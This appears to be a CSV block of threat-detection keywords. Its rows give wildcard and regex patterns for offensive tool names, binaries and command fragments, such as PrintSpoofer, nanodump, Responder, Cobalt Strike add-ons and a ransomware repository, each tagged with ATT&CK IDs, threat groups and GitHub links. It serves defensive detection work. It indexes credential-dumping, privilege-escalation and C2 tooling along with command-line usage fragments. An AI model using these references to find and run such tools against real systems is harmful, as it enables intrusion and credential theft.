"*praetorian.antihacker*",".{0,1000}praetorian\.antihacker.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55362"
"*praetorian.com/blog/relaying-to-adfs-attacks/*",".{0,1000}praetorian\.com\/blog\/relaying\-to\-adfs\-attacks\/.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","55363"
"*praetorian-inc/ADFSRelay*",".{0,1000}praetorian\-inc\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","55364"
"*praetorian-inc/gato*",".{0,1000}praetorian\-inc\/gato.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","55365"
"*praetorian-inc/noseyparker*",".{0,1000}praetorian\-inc\/noseyparker.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","55366"
"*praetorian-inc/PortBender*",".{0,1000}praetorian\-inc\/PortBender.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55367"
"*Prasadhak.ps1*",".{0,1000}Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55368"
"*pre2k auth * --dc-ip *",".{0,1000}pre2k\sauth\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55369"
"*prepare_ppl_command_line*",".{0,1000}prepare_ppl_command_line.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55370"
"*prepareResponseForHiddenAPICall*",".{0,1000}prepareResponseForHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","55371"
"*Preparing Windows for Responder...\nDisabling NetBIOS*",".{0,1000}Preparing\sWindows\sfor\sResponder\.\.\.\\nDisabling\sNetBIOS.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","55372"
"*Prepouce/CoercedPotato*",".{0,1000}Prepouce\/CoercedPotato.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","55373"
"*Press a key to end PoC?*",".{0,1000}Press\sa\skey\sto\send\sPoC\?.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#content","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","55374"
"*PrimusC2-main.zip*",".{0,1000}PrimusC2\-main\.zip.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","55375"
"*Prince-Ransomware/releases/download*",".{0,1000}Prince\-Ransomware\/releases\/download.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","55376"
"*print_shtinkering_crash_location*",".{0,1000}print_shtinkering_crash_location.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55377"
"*printerbug.py *:*@* *",".{0,1000}printerbug\.py\s.{0,1000}\:.{0,1000}\@.{0,1000}\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55378"
"*PrinterNotifyPotato *",".{0,1000}PrinterNotifyPotato\s.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","55379"
"*PrinterNotifyPotato.*",".{0,1000}PrinterNotifyPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","55380"
"*Println(""DO WESTERN!!""*",".{0,1000}Println\(\""DO\sWESTERN!!\"".{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#content","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","55381"
"*PrintNightmare.*",".{0,1000}PrintNightmare\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","55382"
"*PrintNightmare.dll*",".{0,1000}PrintNightmare\.dll.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","1","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","55383"
"*printnightmare_check*",".{0,1000}printnightmare_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","55384"
"*PrintNotifyPotato.exe*",".{0,1000}PrintNotifyPotato\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","55385"
"*PrintNotifyPotato-NET2.exe*",".{0,1000}PrintNotifyPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","55386"
"*printspoofer -Command*",".{0,1000}printspoofer\s\-Command.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55387"
"*PrintSpoofer v%ws (by @itm4n)*",".{0,1000}PrintSpoofer\sv\%ws\s\(by\s\@itm4n\).{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55388"
"*PrintSpoofer v%ws (by @itm4n)*",".{0,1000}PrintSpoofer\sv\%ws\s\(by\s\@itm4n\).{0,1000}","offensive_tool_keyword","PrintSpoofer","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55389"
"*PrintSpoofer-*",".{0,1000}PrintSpoofer\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","55390"
"*PrintSpoofer.*",".{0,1000}PrintSpoofer\..{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","55391"
"*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55392"
"*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55393"
"*PrintSpoofer.exe*",".{0,1000}PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55394"
"*printspoofer.exe*",".{0,1000}printspoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","55395"
"*printspoofer.py*",".{0,1000}printspoofer\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55396"
"*PrintSpoofer.sln*",".{0,1000}PrintSpoofer\.sln.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55397"
"*PrintSpoofer_x64.exe*",".{0,1000}PrintSpoofer_x64\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55398"
"*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55399"
"*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55400"
"*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55401"
"*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55402"
"*PrintSpoofer-master*",".{0,1000}PrintSpoofer\-master.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","55403"
"*PrintSpooferNet.exe*",".{0,1000}PrintSpooferNet\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55404"
"*Priv Esc Check Bof*",".{0,1000}Priv\sEsc\sCheck\sBof.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55405"
